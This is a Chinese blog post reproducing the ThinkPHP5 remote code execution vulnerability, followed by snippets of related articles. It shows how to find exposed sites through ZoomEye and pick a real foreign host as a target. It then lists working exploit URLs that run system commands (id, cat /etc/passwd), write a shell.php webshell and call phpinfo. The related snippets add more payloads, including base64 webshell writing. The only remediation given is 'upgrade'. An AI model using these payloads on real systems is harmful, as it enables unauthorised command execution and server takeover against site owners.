think php 远程代码执行,thinkphp5远程代码执行复现

最新推荐文章于 2023-03-15 17:58:01 发布

猛男阿煊

最新推荐文章于 2023-03-15 17:58:01 发布

阅读量125

点赞数

文章标签： think php 远程代码执行

0x01前言

12 月 10 日，ThinkPHP 官方发布了安全更新，其中修复了 ThinkPHP5 框架的一个高危漏洞：

https://blog.thinkphp.cn/869075

0x02 漏洞复现：

zoomeye搜索关键字“你值得信赖的PHP框架” ，搜到424个thinkphp5的站：

gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==

找个国外地址作为目标:

exp:

?s=index/\think\Request/input&filter=phpinfo&data=1

?s=index/\think\Request/input&filter=system&data=id

?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=

?s=index/\think\view\driver\Php/display&content=

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

exp代码：shell

index.php?s=index/\think\Request/input&filter=system&data=cat /etc/passwd

漏洞证明：

gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==

0x03 漏洞修复：

升级

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

猛男阿煊

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

ThinkPHP5远程代码执行漏洞（call_user_func_array、invokefunction、vars）

墨痕诉清风的博客

07-15

350

ThinkPHP是一款运用极广的PHP开发框架。其版本5中，由于没有正确处理控制器名，导致在网站没有开启强制路由的情况下（即默认情况下）可以执行任意方法，从而导致远程命令执行漏洞。

thinkphp远程代码执行exp

07-29

thinkphp的远程代码执行漏洞的exp，版本通用，带检查，上传等功能。

参与评论您还未登录，请先登录后发表或查看评论

thinkphp5+远程代码执行_Thinkphp5框架变量覆盖导致远程代码执行

weixin_39948247的博客

11-25

199

Thinkphp5.0.x框架对输入数据过滤不严，导致Request类成员存在变量覆盖问题，在一定情况下能导致远程代码执行漏洞。介绍Thinkphp框架官方提供核心版和完整版两种：核心版因默认缺少利用链，需要开启Debug模式，才能造成远程代码执行。完整版因自动加载组件，不需要开启Debug模式，直接造成远程代码执行。本文将对thinkphp5.0.23核心版和thinkphp5.0.22完整版进...

ThinkPHP5远程代码执行exp利用工具safe6

safe6

12-12

7080

影响范围：ThinkPHP 5.0 - 5.1版本。危害：远程代码执行目前，ThinkPHP已发布新版本修复此漏洞，请广大ThinkPHP站长尽快升级： https://blog.thinkphp.cn/869075 2018.12.11 说明：漏洞检测，5.0和5.1都可以检测。命令执行，文件上传只支持5.0版本tp。5.1和5.0利用大同小异，不打算写。这只是个练手...

ThinkPHP5 5.0.23 远程代码执行漏洞复现，python编写POC和EXP

wangqiao258的博客

10-05

1464

环境搭建：使用vulhub，进入对应文件夹启动环境： [root@localhost ~]# cd /home/vulhub/thinkphp/5.0.23-rce/ [root@localhost 5.0.23-rce]# docker-compose up -d 查看端口： [root@localhost 5.0.23-rce]# docker ps CONTAINER ID IMAGE COMMAND CREATED

ThinkPHP5.0.23 远程代码执行漏洞

夜星空如海的博客

09-30

1887

ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中，获取 method 的方法中没有正确处理方法名，导致攻击者可以调用 Request 类任意方法并构造利用链，从而导致远程代码执行漏洞。

复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞

weixin_67813445的博客

03-15

709

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。

复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞

记录笔记

04-12

531

ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8089/index.php?s=captcha会出现如下报错 F12进入开发者用HackBar 插件发送 POST 请求得到回显：通过echo命令写入 Webshell 文件首先将一句话木马进行 Base64 编码 _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE

漏洞通告ThinkPHP远程代码执行漏洞

最新发布

05-05

【漏洞通告】ThinkPHP远程代码执行漏洞

ThinkPHP 5.0 远程代码执行漏洞分析

02-21

### ThinkPHP 5.0 远程代码执行漏洞分析 #### 漏洞背景与概述 ThinkPHP是一款广泛使用的PHP框架，它提供了丰富的功能和良好的性能。然而，如同任何复杂的软件系统一样，它也存在安全漏洞。本次分析的焦点集中在...

thinkphp5远程代码执行漏洞分析(一)

weixin_30482383的博客

08-28

637

payload 测试版本thinkphp5.1beta url =>http://127.0.0.1/thinkphp5.1beta/public/index.php?s=index/\think\Container/invokefunction&function=call_user_func&vars[0]=phpinfo&vars[1]=1 漏洞...

thinkphp5.0.22漏洞利用

qq_52223347的博客

03-10

3759

一、搭建环境 phpstudy的版本大于5.0 解压源码到www下浏览器访问 127.0.0.1/thinkphp/public/index.php 漏洞利用 ?s=.|think\config/get&name=database.username 查看数据库的用户 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami whoa

萌新框架漏洞初探-thinkphp RCE

small_whitehat的博客

03-01

293

萌新框架漏洞初探-thinkphp RCE

ThinkPHP 5.1.x远程命令执行漏洞利用，参考POC

weixin_35771144的博客

02-28

1987

　　thinkphp5.1.1为例 1、代码执行: http://192.168.0.108/public//index.php?s=index/\think\Request/input&filter=phpinfo&data=1 2、命令执行: http://192.168.0.108/public//index.php?s=index/\think...

php5.2 $_GET漏洞,ThinkPHP5 远程代码执行漏洞-动态分析

weixin_35801437的博客

04-05

506

0x01 前言ThinkPHP官方最近修复了一个严重的远程代码执行漏洞。这个主要漏洞原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令，受影响的版本包括5.0和5.1版本。0x02 环境程序源码下载：http://www.thinkphp.cn/download/967.htmlWeb环境：Windows 10 x64+PHPStudy 20018...

ThinkPHP漏洞大全

热门推荐

FY10033的博客

05-04

1万+

tp5payload大全 https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection tp5参考文献 https://blog.csdn.net/weixin_40709439/article/details/86564457 tp版本发现 1.使用错误的路径 2.采用错误的参数 1.版本5.0.x<5.0.23 1.0 5.0.x-5.0.23通杀RCE-payload # 第一个 http://127.0.0.1/cms/thi

php流水记录代码,thinkphp 5.0-5.1 命令执行流水账记录

weixin_39617702的博客

03-11

185

0x00 没有开头环境部署安排一下 bt一键部署：配合泛解析域名，轻松部署环境漏洞复现 qq.com 为 vuln hosthttp://qq.com/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[l][]=id//5.1http://qq.com...

ZoomEye搜索

weixin_51458001的博客

11-08

587

利用ZoomEye搜索一个西门子公司工控设备，并描述其可能存在的安全问题百度搜索ZoomEye，进一步搜索西门子公司工控设备从中我们就能看到具体的文件泄露，或者呗攻击的原因啦

thinkphp日志泄漏漏洞_thinkPHP命令执行漏洞

weixin_39948210的博客

12-20

564

thinkPHP中反斜杠的作用是类库\命名空间命令执行的姿势通过反射invokefunction调用call_user_func_array方法，call_user_func_array函数接受两个参数，第一个为函数名，第二个为函数参数数组，如下所示，通过call_user_func_array函数调用system执行whoami函数?s=index/think\app/invokefunctio...

ThinkPHP 5.0 远程代码执行漏洞分析及利用

"Thinkphp-5-0远程代码执行漏洞1" 在本文中，我们将深入探讨ThinkPHP 5.0版本的一个远程代码执行漏洞，该漏洞可能导致恶意攻击者通过精心构造的输入来执行任意代码，从而对受影响的应用程序造成严重危害。我们将...